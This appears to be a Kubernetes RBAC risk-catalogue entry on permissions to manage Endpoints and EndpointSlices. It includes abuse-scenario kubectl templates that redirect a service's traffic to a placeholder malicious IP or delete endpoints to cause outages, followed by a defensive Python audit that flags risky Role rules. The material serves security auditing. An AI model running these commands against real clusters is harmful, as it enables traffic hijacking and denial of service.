Manage Endpoints or EndpointSlices in a namespace
NetworkManipulation
High
Overview
| Field | Value |
|---|---|
| ID | 1074 |
| Name | Manage Endpoints or EndpointSlices in a namespace |
| Risk Category | NetworkManipulation |
| Risk Level | High |
| Role Type | Role |
| API Groups | core, discovery.k8s.io |
| Resources | endpoints, endpointslices |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] · [get] · [list] |
| Tags | DenialOfService NetworkManipulation Tampering TrafficRedirection |
Description
Permits creating, updating, or deleting Endpoints/EndpointSlices for services within a specific namespace. This can lead to traffic redirection, denial of service, or network policy bypass for applications within that namespace.
Abuse Scenarios
- Create a new Endpoint to redirect traffic for a service in the namespace.

```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Endpoints
metadata:
  name: <service-name> # Must match an existing service name
subsets:
  - addresses:
      - ip: <malicious-ip-address>
    ports:
      - port: <service-port>
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF (redirect 'my-app-service')
```

- Delete an existing Endpoint within the namespace, causing service disruption.

```bash
kubectl delete endpoint <endpoint-name> -n <namespace>
# Example: kubectl delete endpoint my-frontend-service -n default
```
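A defender-side audit for this entry, added here as an example and not part of the original catalogue: it walks the rules of a Role/ClusterRole manifest (already parsed into a dict; the `WEAK_ROLE` and `HARDENED_ROLE` samples are constructed) and flags any rule granting create/update/patch/delete on endpoints or endpointslices, treating the RBAC `*` wildcard as a match.

```python
"""Audit check for risk 1074: RBAC rules that can write Endpoints/EndpointSlices.
Added example, not part of the original catalogue entry; the Role manifest is
passed in already parsed (a dict, as yaml.safe_load would give), so it runs offline."""
from typing import Dict, List, Set

# (apiGroup, resource) pairs this entry covers; the core group is "" in RBAC rules.
RISKY_RESOURCES = {("", "endpoints"), ("discovery.k8s.io", "endpointslices")}
WRITE_VERBS = {"create", "update", "patch", "delete"}


def _expand(values: List[str], universe: Set[str]) -> Set[str]:
    """Map the RBAC wildcard '*' onto every value the check cares about."""
    return set(universe) if "*" in values else set(values)


def find_risky_rules(role: Dict) -> List[Dict]:
    """One finding per (rule index, resource) that grants any write verb."""
    findings = []
    for idx, rule in enumerate(role.get("rules", [])):
        groups = _expand(rule.get("apiGroups", []), {g for g, _ in RISKY_RESOURCES})
        resources = _expand(rule.get("resources", []), {r for _, r in RISKY_RESOURCES})
        verbs = sorted(_expand(rule.get("verbs", []), WRITE_VERBS) & WRITE_VERBS)
        for group, resource in sorted(RISKY_RESOURCES):
            if verbs and group in groups and resource in resources:
                findings.append({"rule": idx, "apiGroup": group or "core",
                                 "resource": resource, "verbs": verbs})
    return findings


# Constructed sample: reads like a "service reader" Role, but rule 0 also lets the
# subject patch Endpoints and rule 2 is a wildcard grant (flagged for both resources).
WEAK_ROLE = {"kind": "Role", "metadata": {"name": "service-reader", "namespace": "default"},
    "rules": [
        {"apiGroups": [""], "resources": ["services", "endpoints"], "verbs": ["get", "list", "patch"]},
        {"apiGroups": ["discovery.k8s.io"], "resources": ["endpointslices"], "verbs": ["get", "list", "watch"]},
        {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]},
    ]}

# Least-privilege rewrite: read-only on both resources, no wildcards -> no findings.
HARDENED_ROLE = {"kind": "Role", "metadata": {"name": "service-reader", "namespace": "default"},
    "rules": [{"apiGroups": ["", "discovery.k8s.io"],
               "resources": ["services", "endpoints", "endpointslices"],
               "verbs": ["get", "list", "watch"]}]}
```

Run `find_risky_rules` over every Role and ClusterRole exported from a cluster (for example the output of `kubectl get roles,clusterroles -A -o json`, parsed with the standard `json` module) to list the rules that need tightening.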